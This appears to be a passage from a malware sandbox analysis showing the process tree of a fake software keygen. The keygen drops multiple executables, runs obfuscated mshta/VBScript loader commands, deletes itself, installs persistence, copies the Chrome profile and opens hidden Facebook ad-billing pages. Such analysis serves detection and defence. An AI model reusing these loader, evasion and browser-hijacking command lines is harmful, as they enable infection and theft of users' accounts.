                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                              1⤵
                                                                                                                                PID:2696
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2680
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                1⤵
                                                                                                                                  PID:2440
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                  1⤵
                                                                                                                                    PID:1332
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                    1⤵
                                                                                                                                      PID:1184
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                      1⤵
                                                                                                                                        PID:1088
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        PID:1028
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                          C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:5604
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\grhrffr"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:5600
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                          C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:6124
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\grhrffr"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5056
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\grhrffr
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\grhrffr"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            PID:2220
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:340
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:912
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                            2⤵
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:2308
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:1304
                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4416
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_serial_key_gen_by_TSRh.exe"
                                                                                                                                            1⤵
                                                                                                                                              PID:1156
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                2⤵
                                                                                                                                                  PID:3572
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                    keygen-pr.exe -p83fsase3Ge
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4680
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4432
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4776
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                      keygen-step-1.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4888
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                      keygen-step-5.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5096
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN ( "C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If """"== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL " , 0 ) )
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4224
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -Im "%~NXa" /f > NuL
                                                                                                                                                            5⤵
                                                                                                                                                              PID:3508
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe
                                                                                                                                                                NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4828
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN ( "C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""/pfztvgOHczW8518 ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL " , 0 ) )
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:1848
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If "/pfztvgOHczW8518 "== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" ) do taskkill -Im "%~NXa" /f > NuL
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:4992
                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      "C:\Windows\System32\regsvr32.exe" .\xUHTZND.6T /U -S
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                      PID:3076
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill -Im "keygen-step-5.exe" /f
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4988
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                              keygen-step-2.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              PID:4620
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1597.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1597.tmp.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:4256
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\1597.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:3524
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:4708
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4016
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:4600
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                  keygen-step-3.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5016
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3572
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:2176
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                    keygen-step-4.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    PID:4796
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4784
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:5088
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\JoSetp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\JoSetp.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4300
                                                                                                                                                                      • C:\ProgramData\1245200.exe
                                                                                                                                                                        "C:\ProgramData\1245200.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:4936
                                                                                                                                                                      • C:\ProgramData\4720185.exe
                                                                                                                                                                        "C:\ProgramData\4720185.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        PID:3980
                                                                                                                                                                        • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                          "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4644
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                      PID:4196
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5076
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4996
                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                          xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:1076
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:3704
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaa24f4f50,0x7ffaa24f4f60,0x7ffaa24f4f70
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4696
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1516 /prefetch:2
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4564
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1908 /prefetch:8
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:5116
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2372 /prefetch:8
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:2976
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4964
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4368
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4044
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4000
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:1560
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:3756
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5812 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:5660
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5724 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:856
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5468 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4472
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4168 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:6688
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2528 /prefetch:8
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4364
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2220 /prefetch:2
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4140
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5924 /prefetch:8
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:1260
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5536 /prefetch:8
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:5692
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=656 /prefetch:8
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:7032
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6076
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5432 /prefetch:8
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5352 /prefetch:8
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:5256
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,15866368564260798038,1626288080437643455,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4168 /prefetch:8
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:5640
